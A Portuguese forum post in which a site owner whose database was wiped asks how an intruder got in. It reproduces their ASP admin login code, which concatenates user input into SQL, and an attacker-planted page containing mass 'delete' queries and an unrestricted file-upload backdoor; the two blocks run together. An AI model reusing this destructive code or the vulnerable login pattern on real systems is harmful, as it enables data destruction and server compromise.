deletaram os registros do DB
Oi pessoal, boa tarde.
acessei o site hoje e descobri que estava com um erro na default, então fui ver o que podia estar ocorrendo e pra minha supresa descobri que todos os registros do DB foram apagados, mas como???
Como recentemente tive suspeitas de que alguém estava invadindo meu site um amigo aqui do fórum me passou uma correção no meu código que estava resolvendo... mas agora pelo visto não resolve mais porque conseguiram entrar...
Encontrei no FTP esta página que não faz parte do meu site, então quem e como enviaram???
queria entender como é feito isso e evitar os acessos...
Vou postar o código de segurança da minha página e em seguida o arquivo que o cara mandou... vejam:
Parte do código da página de administração:
<!--#include file="conexao.asp"-->
<%
if request.querystring = "Login" then
if request.form("Login") <> "" and request.form("Senha") <> "" then
Login = replace(request.form("Login"), "'", "")
Senha = replace(request.form("Senha"), "'", "")
set Verificar = conexao.execute("select * from Administracao where Login='" & login & "' and Senha='" & Senha & "'")
if Verificar.eof then
MSG = 2
else
session("ADM") = Verificar("Login")
session("ADM2") = Verificar("Nivel")
end if
Verificar.close
else
MSG = 1
end if conexao.execute("delete * from Noticias where Titulo <> '" & Variavel & "'")
conexao.execute("delete * from Publicidade where Link <> '" & Variavel & "'")
conexao.execute("delete * from Administracao where Login <> '" & Variavel & "'")<%
if left(Request.ServerVariables("HTTP_Content_Type"),19) = "multipart/form-data" then
Set Fields = GetUpload()
FilePath = replace(Server.MapPath("."), "imagens\fotos", "") & Fields("File1").FileName
Fields("File1").Value.SaveAs FilePath
response.write FilePath
end if
%>
<!---#INCLUDE FILE="../../upload/upload.inc" --->
<form method=POST ENCTYPE="multipart/form-data">
<font size="1" face="Verdana">Arquivo: <input type="file" name="File1"> <input type="submit" Name="Action" value="Enviar"></font>
</form>Discussão (3)
Carregando comentários...